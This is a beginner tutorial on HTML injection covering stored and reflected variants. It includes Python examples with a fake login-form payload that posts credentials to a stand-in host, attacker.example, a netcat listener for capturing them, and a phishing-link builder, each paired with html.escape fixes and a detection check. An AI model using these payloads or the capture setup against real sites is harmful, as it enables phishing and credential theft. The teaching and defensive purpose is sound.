Beginner Guide to HTML Injection

From W3schools
HTML is the standard Hyper Text Markup Language used for designing web pages.

·         HTML describes the structure of Web pages using markup.
·         HTML elements are the building blocks of HTML pages.
·         HTML elements are represented by tags.
·         HTML tags label pieces of content such as "heading", "paragraph", "table", and so on.

·         Browsers do not show the HTML tags, but use them to render the content of the page.


HTML Tags
HTML tags are element names surrounded by angle brackets. They come in two types: the start tag, also known as the opening tag, and the end tag, also known as the closing tag.


HTML Elements
An HTML element usually consists of a start tag and an end tag, with the content inserted in between.


HTML Attributes
Attributes provide additional information about HTML elements. Attributes generally come in the form of name/value pairs like name="value".

Create a web page using HTML

Generally “Notepad” (or any plain-text editor) is used for writing HTML code. Save the text file with a .html or .htm extension, for example “test.html”, then open the saved file in any web browser.

To create a simple web page, type the following code in Notepad and save it as test.html.

When you open test.html in a web browser you will see the page shown in the image below.

HTML injection is a vulnerability in a website that occurs when user input is not correctly validated and the output is not encoded, so that an attacker is able to inject valid HTML code into a vulnerable web page. Many HTML elements and attributes can be used to inject such content.

If these elements and attributes are fed untrusted input, there is a high risk of an XSS-class attack, specifically HTML injection. If the strings are not correctly sanitized, the same flaw can escalate from injecting markup to injecting script, which is XSS proper.

This vulnerability can have many consequences, such as disclosure of a user's session cookies, which could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims. Note that injected markup alone, with no script at all, is already enough to phish credentials, as the stored example in this post shows.


There are two types of HTML injection:

·         Stored HTML
·         Reflected HTML

Stored HTML
Stored HTML injection is also known as persistent, because the injected malicious markup is permanently stored on the web server and the application serves it back to every user who visits the respective page. When the client interacts with the payload, which appears to be an official part of the website, the injected HTML code is rendered by the browser. The most common example is the comment feature on blogs, which allows users to POST comments for the administrator or other users to read.

Example:
An example of a web application vulnerable to stored HTML injection, which allows users to submit entries to a blog, is shown in the screenshot.


First, the user “raj”, acting as the attacker, makes a normal entry, which is successfully added to the web server's database.


Enter the following HTML code in the text area to carry out the HTML injection attack.

The HTML code above is a payload that creates a fake user login page on the targeted web page and forwards the submitted credentials to the attacker's IP.


As you can see below, the resulting login page looks legitimate to the user and is stored on the web server.



Now when the victim opens the page containing the malicious login form, he sees the web page above, which looks official to him, and submits his credentials into it. As soon as he does so, the request is forwarded to the attacker's IP address.


nc -vlp 80
The attacker receives the user's credentials as an HTTP POST request on netcat (listening on TCP port 80, which requires root privileges on most systems). From the screenshot you can read username=bee & password=bug.
Now the attacker can use these credentials to log in.
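The post's own payload and screenshots are not reproduced here, so the following is an added example (not the original article's code) that models the stored case end to end in Python: a comment store, a vulnerable renderer that emits stored comments verbatim, a hardened renderer that HTML-encodes them, and a check that parses the rendered page the way a browser would and reports any form posting outside the site's origin. The attacker host attacker.example, the site origin blog.example and the comment texts are assumptions made for this example.

```python
import html
from html.parser import HTMLParser

# Hypothetical attacker listener (the post uses the attacker's IP instead).
ATTACKER = "http://attacker.example:80/"

# Constructed stored-HTML-injection payload: a fake login form whose action
# points at the attacker's listener, mirroring the form the post describes.
FAKE_LOGIN_FORM = (
    f'<h3>Please login</h3><form action="{ATTACKER}" method="post">'
    'Username: <input name="username"><br>'
    'Password: <input name="password" type="password"><br>'
    '<input type="submit" value="Login"></form>'
)

# Constructed comment store: one harmless comment, then the payload.
COMMENTS = [
    ("raj", "Nice post!"),
    ("raj", FAKE_LOGIN_FORM),
]


def render_vulnerable(comments):
    """Concatenates stored comments into the page with no output encoding.
    Whatever markup a user stored is emitted verbatim, so the browser
    parses the fake form as a genuine part of the page."""
    return "".join(f"<p><b>{user}</b>: {body}</p>" for user, body in comments)


def render_safe(comments):
    """Same page, but every user-controlled string is HTML-encoded before
    it is placed in an element body: '<' becomes '&lt;', so the stored
    payload is displayed as text instead of being parsed as markup."""
    return "".join(
        f"<p><b>{html.escape(user)}</b>: {html.escape(body)}</p>"
        for user, body in comments
    )


class FormFinder(HTMLParser):
    """Collects the action attribute of every <form> a browser would see."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")


def foreign_form_actions(page, trusted_origin):
    """Returns the action of every form in the rendered page that would
    submit outside the trusted origin: a direct sign of injected markup."""
    finder = FormFinder()
    finder.feed(page)
    return [a for a in finder.actions if not a.startswith(trusted_origin)]


if __name__ == "__main__":
    site = "http://blog.example/"
    print("vulnerable:", foreign_form_actions(render_vulnerable(COMMENTS), site))
    print("safe:      ", foreign_form_actions(render_safe(COMMENTS), site))
```

The fix is contextual output encoding at render time, not input filtering: the comment is stored as typed, but html.escape is applied wherever it is written into an element body. As a second layer, a Content-Security-Policy with a form-action directive restricted to the site's own origin stops the browser from submitting an injected form to a foreign host even if the markup does get in.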


Reflected HTML

Reflected HTML injection, also known as non-persistent, occurs when the web application responds immediately to user input without validating it, which lets an attacker inject browser-rendered markup into a single HTML response. It is named “non-persistent” because the malicious payload is not stored on the web server; the attacker therefore has to deliver a crafted link to the victim, typically through phishing.

The most common place for this kind of vulnerability is a website's search function: the attacker writes arbitrary HTML code in the search box and, if the website is vulnerable, the results page renders that markup as part of the response.

Example:
The following web page allows a user to submit a first and last name, but these text fields are vulnerable to HTML injection.


Now type the following HTML code in the text field for the first name; it creates a link to hackingarticles.in that opens when you click on “RAJ”:

<a href="http://hackingarticles.in">RAJ</a>


Similarly, type the following in the text field for the last name:

CHANDEL


Click the Go button to submit these as the first and last name.

In the screenshot you can see that it has submitted RAJ CHANDEL, and the word “RAJ” contains a link to hackingarticles.in; when you click the link you are forwarded to hackingarticles.in.
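Because the payload never touches the server's storage, the whole attack lives in the URL. The following added Python example (not the original article's code) shows the reflected case from both sides: the attacker packs the anchor payload from this example into a phishing link, a vulnerable handler reflects the query parameters straight into its response, and a hardened handler encodes them. The endpoint victim.example/htmli_get.php is an assumption made for this example; the anchor payload and the names RAJ and CHANDEL are those used above.

```python
import html
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Hypothetical vulnerable endpoint, chosen for this example only.
TARGET = "http://victim.example/htmli_get.php"
# The payloads from the post's reflected example.
PAYLOAD_FIRST = '<a href="http://hackingarticles.in">RAJ</a>'
PAYLOAD_LAST = "CHANDEL"


def craft_phishing_link(target, firstname, lastname):
    """Attacker side: the payload travels URL-encoded inside the query
    string, which is why the victim has to be lured into opening it."""
    query = urlencode({"firstname": firstname, "lastname": lastname})
    return f"{target}?{query}"


def handle_request_vulnerable(url):
    """Server side: reflects the decoded query parameters straight into
    the HTML response, so any markup in them is rendered by the browser."""
    params = parse_qs(urlsplit(url).query)
    first = params.get("firstname", [""])[0]
    last = params.get("lastname", [""])[0]
    return f"<html><body>Welcome {first} {last}</body></html>"


def handle_request_safe(url):
    """Same handler with output encoding: the reflected values are escaped
    for an element-body context, so the anchor appears as literal text."""
    params = parse_qs(urlsplit(url).query)
    first = html.escape(params.get("firstname", [""])[0])
    last = html.escape(params.get("lastname", [""])[0])
    return f"<html><body>Welcome {first} {last}</body></html>"


def rendered_links(page):
    """Hrefs of the anchors a browser would render from this response."""
    return re.findall(r'<a\s+href="([^"]*)"', page)


if __name__ == "__main__":
    link = craft_phishing_link(TARGET, PAYLOAD_FIRST, PAYLOAD_LAST)
    print("phishing link:", link)
    print("vulnerable links:", rendered_links(handle_request_vulnerable(link)))
    print("safe links:      ", rendered_links(handle_request_safe(link)))
```

The encoded link is what a victim would receive by mail; the decoded value only becomes markup once the server writes it back unescaped. The same html.escape call that fixed the stored case fixes this one, because the defect is in the response, not in where the input came from.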
